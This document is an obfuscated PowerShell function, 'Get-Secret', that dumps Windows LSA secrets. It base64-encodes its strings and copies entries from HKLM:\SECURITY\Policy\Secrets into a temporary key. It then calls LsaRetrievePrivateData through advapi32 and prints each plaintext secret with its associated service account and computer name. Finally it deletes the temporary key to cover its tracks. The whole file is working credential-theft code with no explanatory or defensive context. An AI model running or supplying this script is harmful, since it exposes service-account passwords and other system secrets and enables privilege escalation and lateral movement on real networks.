
function Get-Secret {
    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory=$False)]
        [String]
        $RegistryKey
    )
    Begin {
    ${25} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
    if(${25}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
      Write-Warning $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgB1AG4AIAB0AGgAZQAgAEMAbwBtAG0AYQBuAGQAIABhAHMAIABhAG4AIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAA==')))
      Break
    }
    if([System.IntPtr]::Size -eq 8) {
      Write-Warning $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgB1AG4AIABQAG8AdwBlAHIAUwBoAGUAbABsACAAaQBuACAAMwAyAC0AYgBpAHQAIABtAG8AZABlAA==')))
      Break
    }
    if([string]::IsNullOrEmpty($registryKey)) {
      [string[]]$registryKey = (Split-Path (ls HKLM:\SECURITY\Policy\Secrets | Select -ExpandProperty Name) -Leaf)
    }
    if( -not(Test-Path $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFwAXABTAEUAQwBVAFIASQBUAFkAXABQAG8AbABpAGMAeQBcAFMAZQBjAHIAZQB0AHMAXABNAHkAUwBlAGMAcgBlAHQA'))))) {
      md $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFwAXABTAEUAQwBVAFIASQBUAFkAXABQAG8AbABpAGMAeQBcAFMAZQBjAHIAZQB0AHMAXABNAHkAUwBlAGMAcgBlAHQA'))) | Out-Null
    }
    ${24} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IAAgACAAIABbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdAByAHUAYwB0ACAATABTAEEAXwBVAE4ASQBDAE8ARABFAF8AUwBUAFIASQBOAEcACgAgACAAIAAgAHsACgAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAFUASQBuAHQAMQA2ACAATABlAG4AZwB0AGgAOwAKACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAAVQBJAG4AdAAxADYAIABNAGEAeABpAG0AdQBtAEwAZQBuAGcAdABoADsACgAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAQgB1AGYAZgBlAHIAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdAByAHUAYwB0ACAATABTAEEAXwBPAEIASgBFAEMAVABfAEEAVABUAFIASQBCAFUAVABFAFMACgAgACAAIAAgAHsACgAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAGkAbgB0ACAATABlAG4AZwB0AGgAOwAKACAAIAAgACAAIAAgAHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABSAG8AbwB0AEQAaQByAGUAYwB0AG8AcgB5ADsACgAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAEwAUwBBAF8AVQBOAEkAQwBPAEQARQBfAFMAVABSAEkATgBHACAATwBiAGoAZQBjAHQATgBhAG0AZQA7AAoAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAQQB0AHQAcgBpAGIAdQB0AGUAcwA7AAoAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAFMAZQBjAHUAcgBpAHQAeQBEAGUAcwBjAHIAaQBwAHQAbwByADsACgAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAUwBlAGMAdQByAGkAdAB5AFEAdQBhAGwAaQB0AHkATwBmAFMAZQByAHYAaQBjAGUAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGUAbgB1AG0AIABMAFMAQQBfAEEAYwBjAGUAcwBzAFAAbwBsAGkAYwB5ACAAOgAgAGwAbwBuAGcACgAgACAAIAAgAHsACgAgACAAIAAgACAAIABQAE8ATABJAEMAWQBfAFYASQBFAFcAXwBMAE8AQwBBAEwAXwBJAE4ARgBPAFIATQBBAFQASQBPAE4AIAA9ACAAMAB4ADAAMAAwADAAMAAwADAAMQBMACwACgAgACAAIAAgACAAIABQAE8ATABJAEMAWQBfAFYASQBFAFcAXwBBAFUARABJAFQAXwBJAE4ARgBPAFIATQBBAFQASQBPAE4AIAA9ACAAMAB4ADAAMAAwADAAMAAwADAAMgBMACwACgAgACAAIAAgACAAIABQAE8ATABJAEMAWQBfAEcARQBUAF8AUABSAEkAVgBBAFQARQBfAEkATgBGAE8AUgBNAEEAVABJAE8ATgAgAD0AIAAwAHgAMAAwADAAMAAwADAAMAA0AEwALAAKACAAIAAgACAAIAAgAFAATwBMAEkAQwBZAF8AVABSAFUAUwBUAF8AQQBEAE0ASQBOACAAPQAgADAAeAAwADAAMAAwADAAMAAwADgATAAsAAoAIAAgACAAIAAgACAAUABPAEwASQBDAFkAXwBDAFIARQBBAFQARQBfAEEAQwBDAE8AVQBOAFQAIAA9ACAAMAB4ADAAMAAwADAAMAAwADEAMABMACwACgAgACAAIAAgACAAIABQAE8ATABJAEMAWQBfAEMAUgBFAEEAVABFAF8AUwBFAEMAUgBFAFQAIAA9ACAAMAB4ADAAMAAwADAAMAAwADIAMABMACwACgAgACAAIAAgACAAIABQAE8ATABJAEMAWQBfAEMAUgBFAEEAVABFAF8AUABSAEkAVgBJAEwARQBHAEUAIAA9ACAAMAB4ADAAMAAwADAAMAAwADQAMABMACwACgAgACAAIAAgACAAIABQAE8ATABJAEMAWQBfAFMARQBUAF8ARABFAEYAQQBVAEwAVABfAFEAVQBPAFQAQQBfAEwASQBNAEkAVABTACAAPQAgADAAeAAwADAAMAAwADAAMAA4ADAATAAsAAoAIAAgACAAIAAgACAAUABPAEwASQBDAFkAXwBTAEUAVABfAEEAVQBEAEkAVABfAFIARQBRAFUASQBSAEUATQBFAE4AVABTACAAPQAgADAAeAAwADAAMAAwADAAMQAwADAATAAsAAoAIAAgACAAIAAgACAAUABPAEwASQBDAFkAXwBBAFUARABJAFQAXwBMAE8ARwBfAEEARABNAEkATgAgAD0AIAAwAHgAMAAwADAAMAAwADIAMAAwAEwALAAKACAAIAAgACAAIAAgAFAATwBMAEkAQwBZAF8AUwBFAFIAVgBFAFIAXwBBAEQATQBJAE4AIAA9ACAAMAB4ADAAMAAwADAAMAA0ADAAMABMACwACgAgACAAIAAgACAAIABQAE8ATABJAEMAWQBfAEwATwBPAEsAVQBQAF8ATgBBAE0ARQBTACAAPQAgADAAeAAwADAAMAAwADAAOAAwADAATAAsAAoAIAAgACAAIAAgACAAUABPAEwASQBDAFkAXwBOAE8AVABJAEYASQBDAEEAVABJAE8ATgAgAD0AIAAwAHgAMAAwADAAMAAxADAAMAAwAEwACgAgACAAIAAgAH0ACgAKACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAYQBkAHYAYQBwAGkAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAA9ACAAdAByAHUAZQAsACAAUAByAGUAcwBlAHIAdgBlAFMAaQBnACAAPQAgAHQAcgB1AGUAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAATABzAGEAUgBlAHQAcgBpAGUAdgBlAFAAcgBpAHYAYQB0AGUARABhAHQAYQAoAAoAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIABQAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAsAAoAIAAgACAAIAAgACAAcgBlAGYAIABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAEsAZQB5AE4AYQBtAGUALAAKACAAIAAgACAAIAAgAG8AdQB0ACAASQBuAHQAUAB0AHIAIABQAHIAaQB2AGEAdABlAEQAYQB0AGEACgAgACAAIAAgACkAOwAKAAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBhAGQAdgBhAHAAaQAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgAgAD0AIAB0AHIAdQBlACwAIABQAHIAZQBzAGUAcgB2AGUAUwBpAGcAIAA9ACAAdAByAHUAZQApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABMAHMAYQBTAHQAbwByAGUAUAByAGkAdgBhAHQAZQBEAGEAdABhACgACgAgACAAIAAgACAAIABJAG4AdABQAHQAcgAgAHAAbwBsAGkAYwB5AEgAYQBuAGQAbABlACwACgAgACAAIAAgACAAIAByAGUAZgAgAEwAUwBBAF8AVQBOAEkAQwBPAEQARQBfAFMAVABSAEkATgBHACAASwBlAHkATgBhAG0AZQAsAAoAIAAgACAAIAAgACAAcgBlAGYAIABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAFAAcgBpAHYAYQB0AGUARABhAHQAYQAKACAAIAAgACAAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGEAZAB2AGEAcABpADMAMgAuAGQAbABsACIALAAgAFMAZQB0AEwAYQBzAHQARQByAHIAbwByACAAPQAgAHQAcgB1AGUALAAgAFAAcgBlAHMAZQByAHYAZQBTAGkAZwAgAD0AIAB0AHIAdQBlACkAXQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEwAcwBhAE8AcABlAG4AUABvAGwAaQBjAHkAKAAKACAAIAAgACAAIAAgAHIAZQBmACAATABTAEEAXwBVAE4ASQBDAE8ARABFAF8AUwBUAFIASQBOAEcAIABTAHkAcwB0AGUAbQBOAGEAbQBlACwACgAgACAAIAAgACAAIAByAGUAZgAgAEwAUwBBAF8ATwBCAEoARQBDAFQAXwBBAFQAVABSAEkAQgBVAFQARQBTACAATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAAoAIAAgACAAIAAgACAAdQBpAG4AdAAgAEQAZQBzAGkAcgBlAGQAQQBjAGMAZQBzAHMALAAKACAAIAAgACAAIAAgAG8AdQB0ACAASQBuAHQAUAB0AHIAIABQAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAKACAAIAAgACAAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGEAZAB2AGEAcABpADMAMgAuAGQAbABsACIALAAgAFMAZQB0AEwAYQBzAHQARQByAHIAbwByACAAPQAgAHQAcgB1AGUALAAgAFAAcgBlAHMAZQByAHYAZQBTAGkAZwAgAD0AIAB0AHIAdQBlACkAXQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEwAcwBhAE4AdABTAHQAYQB0AHUAcwBUAG8AVwBpAG4ARQByAHIAbwByACgACgAgACAAIAAgACAAIAB1AGkAbgB0ACAAcwB0AGEAdAB1AHMACgAgACAAIAAgACkAOwAKAAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBhAGQAdgBhAHAAaQAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgAgAD0AIAB0AHIAdQBlACwAIABQAHIAZQBzAGUAcgB2AGUAUwBpAGcAIAA9ACAAdAByAHUAZQApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABMAHMAYQBDAGwAbwBzAGUAKAAKACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAAcABvAGwAaQBjAHkASABhAG4AZABsAGUACgAgACAAIAAgACkAOwAKAAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBhAGQAdgBhAHAAaQAzADIALgBkAGwAbAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgAgAD0AIAB0AHIAdQBlACwAIABQAHIAZQBzAGUAcgB2AGUAUwBpAGcAIAA9ACAAdAByAHUAZQApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABMAHMAYQBGAHIAZQBlAE0AZQBtAG8AcgB5ACgACgAgACAAIAAgACAAIABJAG4AdABQAHQAcgAgAGIAdQBmAGYAZQByAAoAIAAgACAAIAApADsA')))
    Add-Type -MemberDefinition ${24} -Name LSAUtil -Namespace LSAUtil
    }
    Process{
    foreach(${6} in $RegistryKey) {
        ${2} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFwAXABTAEUAQwBVAFIASQBUAFkAXABQAG8AbABpAGMAeQBcAFMAZQBjAHIAZQB0AHMAXAA='))) + ${6}
        ${1} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFwAXABTAEUAQwBVAFIASQBUAFkAXABQAG8AbABpAGMAeQBcAFMAZQBjAHIAZQB0AHMAXABNAHkAUwBlAGMAcgBlAHQA')))
        ${20} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQB5AFMAZQBjAHIAZQB0AA==')))
        if(Test-Path ${2}) {
        Try {
            ls ${2} -ErrorAction Stop | Out-Null
        }
        Catch {
            Write-Error -Message $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBjAGMAZQBzAHMAIAB0AG8AIAByAGUAZwBpAHMAdAByAHkAIABEAGUAbgBpAGUAZAAsACAAcgB1AG4AIABhAHMAIABOAFQAIABBAFUAVABIAE8AUgBJAFQAWQBcAFMAWQBTAFQARQBNAA=='))) -Category PermissionDenied
            Break
        }      
        if(Test-Path ${2}) {
            $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB1AHIAcgBWAGEAbAA='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBsAGQAVgBhAGwA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwB1AHAAZABUAGkAbQBlAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB1AHAAZABUAGkAbQBlAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMARABlAHMAYwA='))) | % {
            ${23} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFwAUwBFAEMAVQBSAEkAVABZAFwAUABvAGwAaQBjAHkAXABTAGUAYwByAGUAdABzAFwA'))) + ${6} + "\" + $_
            ${22} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFwAUwBFAEMAVQBSAEkAVABZAFwAUABvAGwAaQBjAHkAXABTAGUAYwByAGUAdABzAFwATQB5AFMAZQBjAHIAZQB0AFwA'))) + $_
            if( -not(Test-Path ${22}) ) {
                md ${22} | Out-Null
            }
            ${21} = gp ${23}
            sp -Path ${22} -Name $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KABkAGUAZgBhAHUAbAB0ACkA'))) -Value ${21}.'(default)'
            }
        }
        $Script:pastevalue
        ${18} = New-Object LSAUtil.LSAUtil+LSA_OBJECT_ATTRIBUTES
        ${18}.Length = 0
        ${18}.RootDirectory = [IntPtr]::Zero
        ${18}.Attributes = 0
        ${18}.SecurityDescriptor = [IntPtr]::Zero
        ${18}.SecurityQualityOfService = [IntPtr]::Zero
        ${19} = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
        ${19}.Buffer = [IntPtr]::Zero
        ${19}.Length = 0
        ${19}.MaximumLength = 0
        ${15} = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
        ${15}.Buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(${20})
        ${15}.Length = [Uint16](${20}.Length * [System.Text.UnicodeEncoding]::CharSize)
        ${15}.MaximumLength = [Uint16]((${20}.Length + 1) * [System.Text.UnicodeEncoding]::CharSize)
        ${13} = [IntPtr]::Zero
        [LSAUtil.LSAUtil+LSA_AccessPolicy]${17} = [LSAUtil.LSAUtil+LSA_AccessPolicy]::POLICY_GET_PRIVATE_INFORMATION
        ${16} = [LSAUtil.LSAUtil]::LSAOpenPolicy([ref]${19}, [ref]${18}, ${17}, [ref]${13})
        if(${16} -ne 0) {
            Write-Warning $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bABzAGEATwBwAGUAbgBQAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAgAFcAaQBuAGQAbwB3AHMAIABFAHIAcgBvAHIAIABDAG8AZABlADoAIAAkAHsAMQA2AH0A')))
            Continue
        }
        ${10} = [IntPtr]::Zero
        ${12} = [LSAUtil.LSAUtil]::LsaRetrievePrivateData(${13}, [ref]${15}, [ref]${10})
        ${14} = [LSAUtil.LSAUtil]::LsaClose(${13})
        ${11} = [LSAUtil.LSAUtil]::LsaNtStatusToWinError(${12})
        if(${11} -ne 0) {
            Write-Warning $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bABzAGEATgB0AHMAUwB0AGEAdAB1AHMAVABvAFcAaQBuAEUAcgByAG8AcgA6ACAAJAB7ADEAMQB9AA==')))
        }
        [LSAUtil.LSAUtil+LSA_UNICODE_STRING]${9} =
        [LSAUtil.LSAUtil+LSA_UNICODE_STRING][System.Runtime.InteropServices.marshal]::PtrToStructure(${10}, [System.Type][LSAUtil.LSAUtil+LSA_UNICODE_STRING])
        Try {
            [string]${5} = [System.Runtime.InteropServices.marshal]::PtrToStringAuto(${9}.Buffer)
            ${5} = ${5}.SubString(0, (${9}.Length / 2))
        }
        Catch {
            ${5} = ""
        }
        if(${6} -match $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBfAFMAQwBfAA==')))) {
            ${8} = ${6} -Replace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBfAFMAQwBfAA==')))
            Try {
            ${7} = gwmi -Query $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBFAEwARQBDAFQAIABTAHQAYQByAHQATgBhAG0AZQAgAEYAUgBPAE0AIABXAGkAbgAzADIAXwBTAGUAcgB2AGkAYwBlACAAVwBIAEUAUgBFACAATgBhAG0AZQAgAD0AIAAnACQAewA4AH0AJwA='))) -ErrorAction Stop
            ${4} = ${7}.StartName
            }
            Catch {
            ${4} = ""
            }
        } else {
            ${4} = ""
        }
        ${3} = New-Object PSObject -Property @{
            Name = ${6};
            Secret = ${5};
            Account = ${4}
        } 
        ${3} | select Name, Account, Secret, @{Name=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAG0AcAB1AHQAZQByAE4AYQBtAGUA')));Expression={$env:COMPUTERNAME}}
        } 
        else {
        Write-Error -Message $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABhAHQAaAAgAG4AbwB0ACAAZgBvAHUAbgBkADoAIAAkAHsAMgB9AA=='))) -Category ObjectNotFound
        }
    }
    }
  end {
    if(Test-Path ${1}) {
      rd -Path $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFwAXABTAEUAQwBVAFIASQBUAFkAXABQAG8AbABpAGMAeQBcAFMAZQBjAHIAZQB0AHMAXABNAHkAUwBlAGMAcgBlAHQA'))) -Recurse -Force
    }
  }
}
